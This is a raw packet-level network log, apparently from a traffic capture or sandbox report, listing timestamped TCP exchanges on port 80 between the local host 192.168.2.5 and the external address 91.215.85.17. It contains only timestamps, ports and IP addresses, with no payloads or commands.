Dec 24, 2023 10:44:27.054657936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054671049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054711103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054721117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054730892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054764032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054768085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054810047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054817915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054853916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054860115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054902077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054915905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.054959059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.054985046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055030107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055051088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055093050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055152893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055197954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055222988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055267096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055274963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055321932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055346966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055389881 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055444002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055457115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055489063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055517912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055558920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055577993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055596113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055605888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055653095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055655956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055692911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055710077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055751085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055773020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055819988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055826902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055886030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055887938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055928946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.055936098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055948973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.055975914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056011915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056070089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056107998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056168079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056190014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056233883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056297064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056346893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056369066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056387901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056387901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056428909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056431055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056468010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056471109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056508064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056521893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056562901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056574106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056637049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056648016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056695938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056704998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056732893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056735039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056781054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056797028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056821108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056864023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056905985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056931973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056946039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.056973934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056986094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.056998014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057040930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057054996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057126045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057143927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057158947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057171106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057204008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057215929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057240009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057251930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057298899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057301998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057358027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057372093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057424068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057451963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057466984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057473898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057523012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057569981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057605028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057625055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057672977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057708025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057749033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057750940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057791948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057810068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057827950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057854891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057872057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057912111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057948112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.057956934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.057987928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058002949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058027983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058059931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058119059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058177948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058192015 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058208942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058221102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058243990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058258057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058296919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058320999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058339119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058404922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058453083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058474064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058516979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058532953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058579922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058602095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058618069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058659077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058693886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058772087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058806896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058829069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058871984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058896065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058939934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.058960915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.058996916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059014082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059123039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059165001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059225082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059307098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059340954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059401035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059478998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059492111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059516907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059529066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059542894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059588909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059597015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059633017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059642076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059679985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059705019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059719086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059743881 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059756041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059828043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059864998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059905052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.059930086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.059982061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060019016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060023069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060061932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060070992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060089111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060122967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060148954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060216904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060251951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060305119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060317993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060342073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060354948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060368061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060389042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060395002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060427904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060453892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060508966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060545921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060564995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060626030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060659885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060664892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060700893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060714960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060798883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060832024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060899019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060911894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.060944080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.060983896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061019897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061022997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061088085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061126947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061150074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061266899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061305046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061322927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061362028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061369896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061415911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061458111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061460972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061510086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061548948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061606884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061619997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061644077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061667919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061690092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061728954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061810017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061847925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061872959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061950922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.061990023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.061997890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062057018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062093019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062097073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062134981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062155008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062202930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062241077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062249899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062318087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062356949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062381029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062417984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062426090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062438965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062474012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062500000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062581062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062617064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062622070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062654972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062678099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062733889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062772036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062772989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062832117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062871933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062896967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062933922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.062947035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.062969923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063009977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063013077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063098907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063134909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063138962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063215971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063256979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063270092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063307047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063316107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063374996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063414097 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063450098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063462973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063498974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063519955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063555956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063575029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063658953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063697100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063704014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063756943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063793898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063796043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063829899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063849926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063906908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.063946962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.063956022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064012051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064050913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064094067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064107895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064135075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064155102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064167023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064219952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064233065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064261913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064275980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064316988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064368963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064408064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064446926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064482927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064521074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064547062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064582109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064595938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064667940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064718008 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064730883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064779997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064824104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064840078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064883947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.064891100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064951897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.064994097 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065021038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065069914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065119028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065156937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065171003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065201998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065216064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065233946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065268040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065310001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065310955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065372944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065416098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065445900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065462112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.065486908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.065500021 CET	80	49716	91.215.85.17	192.168.2.5
